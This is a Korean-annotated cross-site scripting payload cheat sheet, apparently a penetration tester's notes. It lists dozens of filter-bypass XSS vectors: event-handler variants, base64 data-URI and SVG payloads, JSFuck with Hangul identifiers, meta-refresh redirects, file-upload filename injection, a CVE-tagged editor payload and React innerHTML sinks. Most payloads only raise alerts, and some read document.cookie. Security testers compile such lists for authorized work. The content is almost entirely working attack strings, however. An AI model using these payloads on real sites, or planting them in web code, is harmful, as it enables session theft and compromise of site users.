- form 태그
<form onformdata="alert(1)"><button>Click</button></form>
<!—!><h1 value=”—><a href=”javascript:alert(document.document.)”>testing</a>
- img onerror에 대한 다양한 우회
< img src=x onerror=alert(1)> 이게 오리지널이라면
<img/src=x onerror=alert(1)>
<img/src=”x”onerror/alert(1)> 띄어쓰기가 안 될 때 이런 방식도 있음
<img\nsrc=”x”onerror/alert(1)>
<img/src/onerror=alert(1)>
[보고서 쓸 때 XSS 유형]
<script>alert('xss test')</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
window.open('https://hsi.xxx.kr')
<script>console.log("xsstest"+" "+window.origin)</script>
javascript: confirm `1`
alert(window.location.hostname)
// 실행 위치가 자바스크립트 단이면
location.href="https://hsi..kr";
confirm `1`
---------------------------------------------------------------------------
<embed type="text/html" src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoJ3hzc190ZXN0XzIwMjQwNzE4Jyk+IA=="> //svg onload 로 alert띄우기 base64로 인코딩
<embed type="text/html" src=""> // pdf 다운로드 링크를 삽입해서 자동으로 다운받게 하기
<object data="https://hsi..kr" width="400" height="300"></object>
<iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIiAvPgo8L3N2Zz4="></iframe> //img 에서 onerror 로 alert
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a>
1"><input onbeforeinput=alert(1)>
1"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](2)>
<link rel="import" href="data:x <script>alert(1)</script>
e
<svg><script xlink:href=data;,alert(1)></script>
<form onformdata="alert(document.domain)"><button>Click</button></form>
### 페이지가 시작되면 XSS
<body onpageshow=alert(1)>
#### svg 애니메이트 xss
<svg><animate onbegin=alert(1) attributeName=x dur=1s> // onbegin 속성 외 나머지 속성은 없어도 됨
<svg><animate onend=alert(1) attributeName=x dur=1s> // 이거는 svg 애니메이트가 끝나면 터지는 거라 dur 속성이 있어야 함
#### css 실행하면 xss 터지게
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
##### 리다이렉트
<meta content="10;url=https://hsi..kr" http-equiv="refresh" />
<meta content='10;url=https://hsi..kr' http-equiv='refresh' />
<meta content="5;url=javascript:alert(1)" http-equiv="refresh" />
###### 파일 업로드
""><svg onload=alert(document.domain)>.jpg"
""><svg onload=prompt(document.domain)>.jpg"
###### JSFuck을 이용한 한글 페이로드
<meta charset="utf-8">
<script>
([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)
[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()
</script>
<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script>
###### URL
?footbar=<foo%20bar=%250a%20onclick=alert(1)>
##### 검색창에 시도해 볼 만한 거
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
##### WYSIWYG 에디터 (CVE-2024-37629)
<details/open/ontoggle=prompt(origin)>
//#### Basic payload
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
//#### Img payload
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=\u0061\u006C\u0065\u0072\u0074(document.domain)>
">%20<img src=o onerror=alert``>//
//#### Svg payload
<svg onload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) /> (`Firefox` is the only browser which allows self closing script)
//#### html5
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
//###### 모바일에 쓰면 좋은 xss
<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
//#### Div payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
[[[[[ XML ]]]]]
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
[[[ dangerouslySetInnerHTML ]]] 리액트 관련 XSS로, CKEditor 등 해당 에디터를 이용한다면 주목
const markup= {__html:'<img src=x onerror=alert(1)>'};
return <div dangerouslySetInnerHTML={markup} />;
const name = "<img src='x' onerror='alert(1)'>";
el.innerHTML = name; // shows the alert
참조
https://hackr.io/blog/xss-cheat-sheet
트위터 계정: @XssPayloads